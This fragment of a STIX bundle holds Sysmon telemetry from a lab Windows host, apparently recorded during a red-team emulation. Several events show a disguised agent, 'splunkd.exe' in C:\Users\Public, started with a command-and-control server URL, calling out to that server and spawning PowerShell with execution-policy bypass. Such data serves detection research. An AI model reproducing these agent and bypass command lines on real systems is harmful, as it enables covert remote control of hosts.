| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 5353, | |
| "dst_ref": "6", | |
| "src_port": 5353, | |
| "src_ref": "12", | |
| "protocols": [ | |
| "udp", | |
| "ipv6" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv6-addr", | |
| "value": "fe80:0:0:0:6081:41da:9cd5:7c82" | |
| }, | |
| "7": { | |
| "type": "x-ecs-destination", | |
| "domain": "victima" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "ipv6-addr", | |
| "value": "ff02:0:0:0:0:0:0:fb" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:jLS/53wpd/sF3k8gpTAHwvpz5Gk=", | |
| "direction": "ingress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:27:10.732Z", | |
| "last_observed": "2022-07-27T14:27:10.732Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--513dcc43-7388-470e-b8bc-515ecbd5448b", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.778Z", | |
| "modified": "2022-07-28T16:05:45.778Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:27:20.904160765Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:27:14.567Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 8888, | |
| "dst_ref": "6", | |
| "src_port": 50336, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.150" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:IlafauPvjJgU/CaJoIPbhh3/Ryw=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:27:11.746Z", | |
| "last_observed": "2022-07-27T14:27:11.746Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--92606f61-cdce-4d43-bfb6-d38fde898360", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.779Z", | |
| "modified": "2022-07-28T16:05:45.779Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "taskhostw.exe" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Tasks", | |
| "pe_original_file_name": "taskhostw.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 1, | |
| "entity_id": "{ca21cdf6-b5a8-62e0-8c00-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "pid": 1428 | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "taskhostw.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "taskhostw.exe", | |
| "creator_user_ref": "11" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "6", | |
| "ingested": "2022-07-27T03:49:04.360306529Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T03:48:58.043Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "11" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "taskhostw.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "6": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "7", | |
| "8" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "9" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "7": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "8": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "9": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "10": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "11": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "taskhostw.exe" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Tasks", | |
| "pe_original_file_name": "taskhostw.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 1, | |
| "entity_id": "{ca21cdf6-b5a8-62e0-8c00-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T03:48:56.382Z", | |
| "last_observed": "2022-07-27T03:48:56.382Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--bf398f97-0af1-4de3-8b2b-82d6a5d37cd7", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.779Z", | |
| "modified": "2022-07-28T16:05:45.779Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "taskhostw.exe", | |
| "pid": 3124, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T03:49:04.363915787Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T03:48:58.043Z", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-b5a8-62e0-8c00-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "taskhostw.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T03:48:56.715Z", | |
| "last_observed": "2022-07-27T03:48:56.715Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--596c4dfa-c0e6-4fdc-a07e-2203ced2e95d", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.779Z", | |
| "modified": "2022-07-28T16:05:45.779Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "\\??\\C:\\Windows\\system32\\conhost.exe", | |
| "0xffffffff", | |
| "-ForceV1" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\system32\\sc.exe", | |
| "start", | |
| "pushtoinstall", | |
| "registration" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-b5e3-62e0-8f00-000000001400}", | |
| "pe_file_version": "10.0.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Console Window Host", | |
| "pe_original_file_name": "CONHOST.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-b5e3-62e0-9100-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "sc.exe", | |
| "pid": 4484, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\sc.exe start pushtoinstall registration" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "conhost.exe", | |
| "pid": 1852, | |
| "binary_ref": "6", | |
| "command_line": "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T03:50:03.934496929Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T03:49:57.601Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "sc.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "conhost.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "\\??\\C:\\Windows\\system32\\conhost.exe", | |
| "0xffffffff", | |
| "-ForceV1" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\system32\\sc.exe", | |
| "start", | |
| "pushtoinstall", | |
| "registration" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-b5e3-62e0-8f00-000000001400}", | |
| "pe_file_version": "10.0.19041.1566 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Console Window Host", | |
| "pe_original_file_name": "CONHOST.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-b5e3-62e0-9100-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T03:49:55.862Z", | |
| "last_observed": "2022-07-27T03:49:55.862Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--0d40a4cb-e3b8-4dfe-aa23-740ea267c98f", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.780Z", | |
| "modified": "2022-07-28T16:05:45.780Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "conhost.exe", | |
| "pid": 1852, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T03:50:03.941439316Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T03:49:57.602Z", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-b5e3-62e0-9100-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "conhost.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T03:49:56.220Z", | |
| "last_observed": "2022-07-27T03:49:56.220Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--22853efb-390b-4c94-aab9-90fd460e09ef", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.780Z", | |
| "modified": "2022-07-28T16:05:45.780Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "netsvcs", | |
| "-p", | |
| "-s", | |
| "wlidsvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-24d0-62e1-0001-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "pid": 680 | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "svchost.exe", | |
| "pid": 4316, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wlidsvc", | |
| "creator_user_ref": "11" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "6", | |
| "ingested": "2022-07-27T11:43:20.031187257Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T11:43:13.662Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "11" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "6": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "7", | |
| "8" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "9" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "7": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "8": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "9": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "10": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "11": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "netsvcs", | |
| "-p", | |
| "-s", | |
| "wlidsvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-24d0-62e1-0001-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T11:43:12.895Z", | |
| "last_observed": "2022-07-27T11:43:12.895Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--db9c3616-db7c-4baa-bba9-a03e06191a54", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.781Z", | |
| "modified": "2022-07-28T16:05:45.781Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "svchost.exe", | |
| "pid": 4316, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T11:46:20.752584174Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T11:46:14.424Z", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-24d0-62e1-0001-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T11:46:13.279Z", | |
| "last_observed": "2022-07-27T11:46:13.279Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--415461db-5f60-4c95-b926-9d482bccff6a", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.781Z", | |
| "modified": "2022-07-28T16:05:45.781Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "pwd" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b97-62e1-3102-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "splunkd.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Users\\Public\\splunkd.exe\" -server http://192.168.56.150:8888 -group red " | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 7908, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C pwd", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:28:48.107660666Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:28:41.782Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "splunkd.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Users\\Public" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "powershell.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "powershell.exe", | |
| "pid": 7908, | |
| "binary_ref": "6", | |
| "command_line": "powershell.exe -ExecutionPolicy Bypass -C pwd", | |
| "creator_user_ref": "13" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "powershell.exe", | |
| "-ExecutionPolicy", | |
| "Bypass", | |
| "-C", | |
| "pwd" | |
| ], | |
| "parent_args": [ | |
| "C:\\Users\\Public\\splunkd.exe", | |
| "-server", | |
| "http://192.168.56.150:8888", | |
| "-group", | |
| "red" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b3e-62e1-2b02-000000001400}", | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Windows PowerShell", | |
| "pe_original_file_name": "PowerShell.EXE", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files\\WinMail\\", | |
| "args_count": 5, | |
